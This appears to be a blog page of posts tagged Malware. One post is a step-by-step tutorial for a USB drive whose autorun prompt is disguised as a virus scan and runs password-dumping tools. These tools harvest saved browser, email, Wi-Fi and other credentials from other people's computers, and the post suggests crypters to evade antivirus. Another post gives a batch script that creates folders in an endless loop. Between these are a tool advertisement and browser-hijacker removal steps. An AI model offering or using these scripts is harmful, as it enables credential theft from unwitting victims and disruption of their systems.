Showing posts with label Malware. Show all posts

Stealing passwords from a computer with USB


This tutorial will walk you through setting up a USB flash drive to steal the saved passwords on a computer.
  1.  open notepad/wordpad

    type:

    [autorun]
    open=launch.bat
    ACTION= Perform a Virus Scan

    save this as AUTORUN.inf
  2. open a new notepad/wordpad document

    type:

    start mspass.exe /stext mspass.txt
    start mailpv.exe /stext mailpv.txt
    start iepv.exe /stext iepv.txt
    start pspv.exe /stext pspv.txt
    start PasswordFox.exe /stext passwordfox.txt
    start OperaPassView.exe /stext OperaPassView.txt
    start ChromePass.exe /stext ChromePass.txt
    start Dialupass.exe /stext Dialupass.txt
    start netpass.exe /stext netpass.txt
    start WirelessKeyView.exe /stext WirelessKeyView.txt
    start BulletsPassView.exe /stext BulletsPassView.txt
    start VNCPassView.exe /stext VNCPassView.txt
    start OpenedFilesView.exe /stext OpenedFilesView.txt
    start ProduKey.exe /stext ProduKey.txt
    start USBDeview.exe /stext USBDeview.txt


    save this as LAUNCH.bat
  3. copy the autorun and launch file to your USB
  4. go to http://www.nirsoft.net/ and download the programs named in step 2
  5. extract the files you downloaded to your desktop and copy all the .exe files to your USB
  6. remove and re-insert your USB
  7. click on the option perform a virus scan
    (this is an example, if you want it to say something else go to the autorun file and change it ;) )
go to my computer---> USB DRIVE and open it


you will now see some text files, if you open them you will see usernames and passwords
You can use this trick to get saved passwords of your friends , family etc.
Proof:
NOTE : This can be detected by an Antivirus..but you can always use FUD Crypters :)

Hook Analyser 3.1 + Download Link




Hook Analyser is a freeware application which allows an investigator/analyst to perform “static & run-time / dynamic” analysis of suspicious applications, also gather (analyse & co-related) threat intelligence related information (or data) from various open sources on the Internet.


Essentially it’s a malware analysis tool that has evolved to add some cyber threat intelligence features & mapping.



Hook Analyser is perhaps the only “free” software in the market which combines analysis of malware analysis and cyber threat intelligence capabilities. The software has been used by major Fortune 500 organisations.


Features/Functionality
  • Spawn and Hook to Application – Enables you to spawn an application, and hook into it
  • Hook to a specific running process – Allows you to hook to a running (active) process
  • Static Malware Analysis – Scans PE/Windows executables to identify potential malware traces
  • Application crash analysis – Allows you to analyse memory content when an application crashes
  • Exe extractor – This module essentially extracts executables from running process/s


How To Remove Aartemis Virus

Below Is Procedure To Remove Aartemis.com

=>What Is This ? Aartemis.com virus is one more browser hijacker that attacks Internet Explorer, Mozilla Firefox and Google Chrome. The program gets inside computers bundled with free programs that you can download from the Internet. Usually these are free video recorders, players and so on. This is a popular way to distribute various new applications.





=> How To Remove :

For Internet Explorer : 


  1. Click arrow on the right of search box
  2. Do following: On IE8-9 choose Manage Search providers, On ie7 click change search defaults
  3. Remove the Aartemis.com from the list


    For Firefox : 
1.Enter “about:config” in url bar. This will open settings page
    2.Type “Keyword.url” in the search box. Right click it & reset it.
      3.Type “browser.search.defaultengine” in the search box. Right click it & reset it.
        4.Type “browser.search.selectedengine” in the search box. Right click it & reset it.
          5.Search for ‘browser.newtab.url’. Right-click and reset. This will make sure that the search page won’t launch on each new tab.
            6.If the settings revert and scan with anti-malware programs are clean: Close Firefox, open file explorer and enter %AppData% in the address bar. enter user.js in search box. If this file exists, rename it and start Firefox again. You will have to repeat the steps above.
            For Google Chrome : 

            Select Settings.
            Select Basics ->Manage Search engines.
            Remove unnecessary search engines from the list.
            Go back to settings. On Startup choose open blank page ( you can remove undesired pages from the set pages link too).

            Making Virus That Makes 1000 Folders In Few Seconds

            Making A Virus That Makes 1000 Folder In Few Seconds

                 1.Open Notepad And Type Following Code 
            @echo off
            :top
            md %random%
            goto top
                  2.Save It As Anyname.bat [its important that you use .bat extension]



            Now When Anyone Open This File It Will Make Approx. 1000 Folders

            [[Note : This Is For Educational Purpose Only]]